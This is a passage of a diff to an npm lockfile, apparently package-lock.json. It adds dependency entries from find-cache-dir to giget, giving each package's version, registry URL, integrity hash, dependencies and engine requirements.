+ "node_modules/find-cache-dir": { + "version": "2.1.0", + "resolved": 
"https://registry.npmjs.org/find-cache-dir/-/find-cache-dir-2.1.0.tgz", + "integrity": "sha512-Tq6PixE0w/VMFfCgbONnkiQIVol/JJL7nRMi20fqzA4NRs9AfeqMGeRdPi3wIhYkxjeBaWh2rxwapn5Tu3IqOQ==", + "dev": true, + "dependencies": { + "commondir": "^1.0.1", + "make-dir": "^2.0.0", + "pkg-dir": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-cache-dir/node_modules/find-up": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-3.0.0.tgz", + "integrity": "sha512-1yD6RmLI1XBfxugvORwlck6f75tYL+iR0jqwsOrOxMZyGYqUuDhJ0l4AXdO1iX/FTs9cBAMEk1gWSEx1kSbylg==", + "dev": true, + "dependencies": { + "locate-path": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-cache-dir/node_modules/locate-path": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-3.0.0.tgz", + "integrity": "sha512-7AO748wWnIhNqAuaty2ZWHkQHRSNfPVIsPIfwEOWO22AmaoVrWavlOcMR5nzTLNYvp36X220/maaRsrec1G65A==", + "dev": true, + "dependencies": { + "p-locate": "^3.0.0", + "path-exists": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-cache-dir/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/find-cache-dir/node_modules/p-locate": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-3.0.0.tgz", + "integrity": "sha512-x+12w/To+4GFfgJhBEpiDcLozRJGegY+Ei7/z0tSLkMmxGZNybVMSfWj9aJn8Z5Fc7dBUNJOOVgPv2H7IwulSQ==", + "dev": true, + "dependencies": { + "p-limit": "^2.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-cache-dir/node_modules/path-exists": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-3.0.0.tgz", + "integrity": "sha1-zg6+ql94yxiSXqfYENe1mwEP1RU=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/find-cache-dir/node_modules/pkg-dir": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-3.0.0.tgz", + "integrity": "sha512-/E57AYkoeQ25qkxMj5PBOVgF8Kiu/h7cYS30Z5+R7WaiCCBfLq58ZI/dSeaEKb9WVJV5n/03QwrN3IeWIFllvw==", + "dev": true, + "dependencies": { + "find-up": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/find-up": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-5.0.0.tgz", + "integrity": "sha512-78/PXT1wlLLDgTzDs7sjq9hzz0vXD+zn+7wypEe4fXQxCmdmqfGsEPQxmiCSQI3ajFV91bVSsvNtrJRiW6nGng==", + "dependencies": { + "locate-path": "^6.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/find-yarn-workspace-root": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/find-yarn-workspace-root/-/find-yarn-workspace-root-2.0.0.tgz", + "integrity": "sha512-1IMnbjt4KzsQfnhnzNd8wUEgXZ44IzZaZmnLYx7D5FZlaHt2gW20Cri8Q+E/t5tIj4+epTBub+2Zxu/vNILzqQ==", + "dependencies": { + "micromatch": "^4.0.2" + } + }, + "node_modules/findit2": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/findit2/-/findit2-2.2.3.tgz", + "integrity": 
"sha512-lg/Moejf4qXovVutL0Lz4IsaPoNYMuxt4PA0nGqFxnJ1CTTGGlEO2wKgoDpwknhvZ8k4Q2F+eesgkLbG2Mxfog==", + "engines": { + "node": ">=0.8.22" + } + }, + "node_modules/flat": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/flat/-/flat-5.0.2.tgz", + "integrity": "sha512-b6suED+5/3rTpUBdG1gupIl8MPFCAMA0QXwmljLhvCUKcUvdE4gWky9zpuGCcXHOsz4J9wPGNWq6OKpmIzz3hQ==", + "dev": true, + "bin": { + "flat": "cli.js" + } + }, + "node_modules/flat-cache": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", + "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", + "dependencies": { + "flatted": "^3.1.0", + "rimraf": "^3.0.2" + }, + "engines": { + "node": "^10.12.0 || >=12.0.0" + } + }, + "node_modules/flat-cache/node_modules/rimraf": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", + "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/flatted": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.3.1.tgz", + "integrity": "sha512-X8cqMLLie7KsNUDSdzeN8FYK9rEt4Dt67OsG/DNGnYTSDBG4uFAJFBnUeiV+zCVAvwFy56IjM9sH51jVaEhNxw==" + }, + "node_modules/flow-parser": { + "version": "0.250.0", + "resolved": "https://registry.npmjs.org/flow-parser/-/flow-parser-0.250.0.tgz", + "integrity": "sha512-8mkLh/CotlvqA9vCyQMbhJoPx2upEg9oKxARAayz8zQ58wCdABnTZy6U4xhMHvHvbTUFgZQk4uH2cglOCOel5A==", + "dev": true, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/flowstate": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/flowstate/-/flowstate-0.4.1.tgz", + "integrity": "sha1-tfu4t/wte9xbVL5GyYMJ73NvTsA=", + "dependencies": { + "clone": "^1.0.2", + "uid-safe": "^2.1.0", + "utils-flatten": "^1.0.0" + } + }, + "node_modules/flowstate/node_modules/clone": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/clone/-/clone-1.0.4.tgz", + "integrity": "sha1-2jCcwmPfFZlMaIypAheco8fNfH4=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/follow-redirects": { + "version": "1.15.6", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", + "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", + "funding": [ + { + "type": "individual", + "url": "https://github.com/sponsors/RubenVerborgh" + } + ], + "engines": { + "node": ">=4.0" + }, + "peerDependenciesMeta": { + "debug": { + "optional": true + } + } + }, + "node_modules/for-each": { + "version": "0.3.3", + "resolved": "https://registry.npmjs.org/for-each/-/for-each-0.3.3.tgz", + "integrity": "sha512-jqYfLp7mo9vIyQf8ykW2v7A+2N4QjeCeI5+Dz9XraiO1ign81wjiH7Fb9vSOWvQfNtmSa4H2RoQTrrXivdUZmw==", + "dependencies": { + "is-callable": "^1.1.3" + } + }, + "node_modules/for-in": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/for-in/-/for-in-1.0.2.tgz", + "integrity": "sha512-7EwmXrOjyL+ChxMhmG5lnW9MPt1aIeZEwKhQzoBUdTV0N3zuwWDZYVJatDvZ2OyzPUvdIAZDsCetk3coyMfcnQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/foreach": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/foreach/-/foreach-2.0.5.tgz", + "integrity": "sha1-C+4AUBiusmDQo6865ljdATbsG5k=", + "dev": true + }, + 
"node_modules/foreground-child": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-2.0.0.tgz", + "integrity": "sha512-dCIq9FpEcyQyXKCkyzmlPTFNgrCzPudOe+mhvJU5zAtlBnGVy2yKxtfsxK2tQBThwq225jcvBjpw1Gr40uzZCA==", + "dev": true, + "dependencies": { + "cross-spawn": "^7.0.0", + "signal-exit": "^3.0.2" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/forever-agent": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", + "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", + "engines": { + "node": "*" + } + }, + "node_modules/fork-ts-checker-webpack-plugin": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/fork-ts-checker-webpack-plugin/-/fork-ts-checker-webpack-plugin-8.0.0.tgz", + "integrity": "sha512-mX3qW3idpueT2klaQXBzrIM/pHw+T0B/V9KHEvNrqijTq9NFnMZU6oreVxDYcf33P8a5cW+67PjodNHthGnNVg==", + "dev": true, + "license": "MIT", + "dependencies": { + "@babel/code-frame": "^7.16.7", + "chalk": "^4.1.2", + "chokidar": "^3.5.3", + "cosmiconfig": "^7.0.1", + "deepmerge": "^4.2.2", + "fs-extra": "^10.0.0", + "memfs": "^3.4.1", + "minimatch": "^3.0.4", + "node-abort-controller": "^3.0.1", + "schema-utils": "^3.1.1", + "semver": "^7.3.5", + "tapable": "^2.2.1" + }, + "engines": { + "node": ">=12.13.0", + "yarn": ">=1.0.0" + }, + "peerDependencies": { + "typescript": ">3.6.0", + "webpack": "^5.11.0" + } + }, + "node_modules/fork-ts-checker-webpack-plugin/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "license": "MIT", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/fork-ts-checker-webpack-plugin/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/fork-ts-checker-webpack-plugin/node_modules/semver": { + "version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/fork-ts-checker-webpack-plugin/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/form-data": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", + "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", + "dependencies": { + "asynckit": 
"^0.4.0", + "combined-stream": "^1.0.8", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/form-data-encoder": { + "version": "1.7.2", + "resolved": "https://registry.npmjs.org/form-data-encoder/-/form-data-encoder-1.7.2.tgz", + "integrity": "sha512-qfqtYan3rxrnCk1VYaA4H+Ms9xdpPqvLZa6xmMgFvhO32x7/3J/ExcTd6qpxM0vH2GdMI+poehyBZvqfMTto8A==" + }, + "node_modules/formdata-node": { + "version": "4.3.2", + "resolved": "https://registry.npmjs.org/formdata-node/-/formdata-node-4.3.2.tgz", + "integrity": "sha512-k7lYJyzDOSL6h917favP8j1L0/wNyylzU+x+1w4p5haGVHNlP58dbpdJhiCUsDbWsa9HwEtLp89obQgXl2e0qg==", + "dependencies": { + "node-domexception": "1.0.0", + "web-streams-polyfill": "4.0.0-beta.1" + }, + "engines": { + "node": ">= 12.20" + } + }, + "node_modules/formidable": { + "version": "1.2.6", + "resolved": "https://registry.npmjs.org/formidable/-/formidable-1.2.6.tgz", + "integrity": "sha512-KcpbcpuLNOwrEjnbpMC0gS+X8ciDoZE1kkqzat4a8vrprf+s9pKNQ/QIwWfbfs4ltgmFl3MD177SNTkve3BwGQ==", + "deprecated": "Please upgrade to latest, formidable@v2 or formidable@v3! Check these notes: https://bit.ly/2ZEqIau", + "funding": { + "url": "https://ko-fi.com/tunnckoCore/commissions" + } + }, + "node_modules/formik": { + "version": "2.2.9", + "resolved": "https://registry.npmjs.org/formik/-/formik-2.2.9.tgz", + "integrity": "sha512-LQLcISMmf1r5at4/gyJigGn0gOwFbeEAlji+N9InZF6LIMXnFNkO42sCI8Jt84YZggpD4cPWObAZaxpEFtSzNA==", + "dev": true, + "funding": [ + { + "type": "individual", + "url": "https://opencollective.com/formik" + } + ], + "dependencies": { + "deepmerge": "^2.1.1", + "hoist-non-react-statics": "^3.3.0", + "lodash": "^4.17.21", + "lodash-es": "^4.17.21", + "react-fast-compare": "^2.0.1", + "tiny-warning": "^1.0.2", + "tslib": "^1.10.0" + }, + "peerDependencies": { + "react": ">=16.8.0" + } + }, + "node_modules/formik/node_modules/deepmerge": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-2.2.1.tgz", + "integrity": "sha512-R9hc1Xa/NOBi9WRVUWg19rl1UB7Tt4kuPd+thNJgFZoxXsTz7ncaPaeIm+40oSGuP33DfMb4sZt1QIGiJzC4EA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/formik/node_modules/tslib": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-1.14.1.tgz", + "integrity": "sha512-Xni35NKzjgMrwevysHTCArtLDpPvye8zV/0E4EyYn43P7/7qvQwPh9BGkHewbMulVntbigmcT7rdX3BNo9wRJg==", + "dev": true + }, + "node_modules/forwarded": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz", + "integrity": "sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/fraction.js": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/fraction.js/-/fraction.js-4.3.6.tgz", + "integrity": "sha512-n2aZ9tNfYDwaHhvFTkhFErqOMIb8uyzSQ+vGJBjZyanAKZVbGUQ1sngfk9FdkBw7G26O7AgNjLcecLffD1c7eg==", + "dev": true, + "engines": { + "node": "*" + }, + "funding": { + "type": "patreon", + "url": "https://github.com/sponsors/rawify" + } + }, + "node_modules/fragment-cache": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/fragment-cache/-/fragment-cache-0.2.1.tgz", + "integrity": "sha512-GMBAbW9antB8iZRHLoGw0b3HANt57diZYFO/HL1JGIC1MjKrdmhxvrJbupnVvpys0zsz7yBApXdQyfepKly2kA==", + "dev": true, + "dependencies": { + "map-cache": "^0.2.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/freegeoip": { + "resolved": "services/freegeoip", + "link": 
true + }, + "node_modules/fresh": { + "version": "0.5.2", + "resolved": "https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz", + "integrity": "sha1-PYyt2Q2XZWn6g1qx+OSyOhBWBac=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/fs-constants": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs-constants/-/fs-constants-1.0.0.tgz", + "integrity": "sha512-y6OAwoSIf7FyjMIv94u+b5rdheZEjzR63GTyZJm5qh4Bi+2YgwLCcI/fPFZkL5PSixOt6ZNKm+w+Hfp/Bciwow==" + }, + "node_modules/fs-extra": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-10.0.0.tgz", + "integrity": "sha512-C5owb14u9eJwizKGdchcDUQeFtlSHHthBk8pbX9Vc1PFZrLombudjDnNns88aYslCyF6IY5SUw3Roz6xShcEIQ==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/fs-minipass": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", + "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", + "dependencies": { + "minipass": "^3.0.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/fs-mkdirp-stream": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/fs-mkdirp-stream/-/fs-mkdirp-stream-2.0.1.tgz", + "integrity": "sha512-UTOY+59K6IA94tec8Wjqm0FSh5OVudGNB0NL/P6fB3HiE3bYOY3VYBGijsnOHNkQSwC1FKkU77pmq7xp9CskLw==", + "dev": true, + "dependencies": { + "graceful-fs": "^4.2.8", + "streamx": "^2.12.0" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/fs-monkey": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/fs-monkey/-/fs-monkey-1.0.3.tgz", + "integrity": "sha512-cybjIfiiE+pTWicSCLFHSrXZ6EilF30oh91FDP9S2B051prEa7QWfrVTQm10/dDpswBDXZugPa1Ogu8Yh+HV0Q==", + "dev": true + }, + "node_modules/fs-readdir-recursive": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/fs-readdir-recursive/-/fs-readdir-recursive-1.1.0.tgz", + "integrity": "sha512-GNanXlVr2pf02+sPN40XN8HG+ePaNcvM0q5mZBd668Obwb0yD5GiUbZOFgwn8kGMY6I3mdyDJzieUy3PTYyTRA==", + "dev": true + }, + "node_modules/fs.realpath": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", + "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=" + }, + "node_modules/fsevents": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", + "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", + "dev": true, + "hasInstallScript": true, + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^8.16.0 || ^10.6.0 || >=11.0.0" + } + }, + "node_modules/function-bind": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/function.prototype.name": { + "version": "1.1.6", + "resolved": "https://registry.npmjs.org/function.prototype.name/-/function.prototype.name-1.1.6.tgz", + "integrity": "sha512-Z5kx79swU5P27WEayXM1tBi5Ze/lbIyiNgU3qyXUOf9b2rgXYyF9Dy9Cx+IQv/Lc8WCG6L82zwUPpSS9hGehIg==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "es-abstract": "^1.22.1", + "functions-have-names": "^1.2.3" + }, + "engines": { + "node": ">= 0.4" + }, + 
"funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/functional-red-black-tree": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz", + "integrity": "sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g==", + "dev": true + }, + "node_modules/functions-have-names": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/functions-have-names/-/functions-have-names-1.2.3.tgz", + "integrity": "sha512-xckBUXyTIqT97tq2x2AMb+g163b5JFysYk0x4qxNFwbfQkmNZoiRHb6sPzI9/QV33WeuvVYBUIiD4NzNIyqaRQ==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/fuse.js": { + "version": "3.6.1", + "resolved": "https://registry.npmjs.org/fuse.js/-/fuse.js-3.6.1.tgz", + "integrity": "sha512-hT9yh/tiinkmirKrlv4KWOjztdoZo1mx9Qh4KvWqC7isoXwdUY3PNWUxceF4/qO9R6riA2C29jdTOeQOIROjgw==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/gauge": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/gauge/-/gauge-3.0.2.tgz", + "integrity": "sha512-+5J6MS/5XksCuXq++uFRsnUd7Ovu1XenbeuIuNRJxYWjgQbPuFhT14lAvsWfqfAmnwluf1OwMjz39HjfLPci0Q==", + "dependencies": { + "aproba": "^1.0.3 || ^2.0.0", + "color-support": "^1.1.2", + "console-control-strings": "^1.0.0", + "has-unicode": "^2.0.1", + "object-assign": "^4.1.1", + "signal-exit": "^3.0.0", + "string-width": "^4.2.3", + "strip-ansi": "^6.0.1", + "wide-align": "^1.1.2" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/gaxios": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-5.0.2.tgz", + "integrity": "sha512-TjtV2AJOZoMQqRYoy5eM8cCQogYwazWNYLQ72QB0kwa6vHHruYkGmhhyrlzbmgNHK1dNnuP2WSH81urfzyN2Og==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^5.0.0", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.7" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/gcp-metadata": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-5.3.0.tgz", + "integrity": "sha512-FNTkdNEnBdlqF2oatizolQqNANMrcqJt6AAYt99B3y1aLLC8Hc5IOBb+ZnnzllodEEf6xMBp6wRcBbc16fa65w==", + "dependencies": { + "gaxios": "^5.0.0", + "json-bigint": "^1.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/generic-pool": { + "version": "2.5.4", + "resolved": "https://registry.npmjs.org/generic-pool/-/generic-pool-2.5.4.tgz", + "integrity": "sha1-OMYYhRPhQDCUjsblz2VSPZd5KZs=", + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/gensync": { + "version": "1.0.0-beta.2", + "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", + "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", + "dev": true, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/get-caller-file": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", + "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "engines": { + "node": "6.* || 8.* || >= 10.*" + } + }, + "node_modules/get-func-name": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/get-func-name/-/get-func-name-2.0.2.tgz", + "integrity": "sha512-8vXOvuE167CtIc3OyItco7N/dpRtBbYOsPsXCz7X/PMnlGjYjSGuZJgM1Y7mmew7BKf9BqvLX2tnOVy1BBUsxQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/get-intrinsic": { + "version": 
"1.2.4", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.2.4.tgz", + "integrity": "sha512-5uYhsJH8VJBTv7oslg4BznJYhDoRI6waYCxMmCdnTrcCrHA/fCFKoTFz2JKKE0HdDFUF7/oQuhzumXJK7paBRQ==", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2", + "has-proto": "^1.0.1", + "has-symbols": "^1.0.3", + "hasown": "^2.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-package-type": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", + "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/get-port": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/get-port/-/get-port-5.1.1.tgz", + "integrity": "sha512-g/Q1aTSDOxFpchXC4i8ZWvxA1lnPqx/JHqcpIw0/LX9T8x/GBbi6YnlN5nhaKIFkT8oFsscUKgDJYxfwfS6QsQ==", + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/get-stream": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-5.2.0.tgz", + "integrity": "sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==", + "dev": true, + "dependencies": { + "pump": "^3.0.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/get-symbol-description": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/get-symbol-description/-/get-symbol-description-1.0.2.tgz", + "integrity": "sha512-g0QYk1dZBxGwk+Ngc+ltRH2IBp2f7zBkBMBJZCDerh6EhlhSR6+9irMCuT/09zD6qkarHUSn529sK/yL4S27mg==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.5", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/get-value": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/get-value/-/get-value-2.0.6.tgz", + "integrity": "sha512-Ln0UQDlxH1BapMu3GPtf7CuYNwRZf2gwCuPqbyG6pB8WfmFpzqcy4xtAaAMUhnNqjMKTiCPZG2oMT3YSx8U2NA==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/getopts": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/getopts/-/getopts-2.3.0.tgz", + "integrity": "sha512-5eDf9fuSXwxBL6q5HX+dhDj+dslFGWzU5thZ9kNKUkcPtaPdatmUFKwHFrLb/uf/WpA4BHET+AX3Scl56cAjpA==" + }, + "node_modules/getos": { + "version": "3.2.1", + "resolved": "https://registry.npmjs.org/getos/-/getos-3.2.1.tgz", + "integrity": "sha512-U56CfOK17OKgTVqozZjUKNdkfEv6jk5WISBJ8SHoagjE6L69zOwl3Z+O8myjY9MEW3i2HPWQBt/LTbCgcC973Q==", + "dev": true, + "dependencies": { + "async": "^3.2.0" + } + }, + "node_modules/getpass": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", + "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", + "dependencies": { + "assert-plus": "^1.0.0" + } + }, + "node_modules/getpass/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/giget": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/giget/-/giget-1.2.5.tgz", + "integrity": 
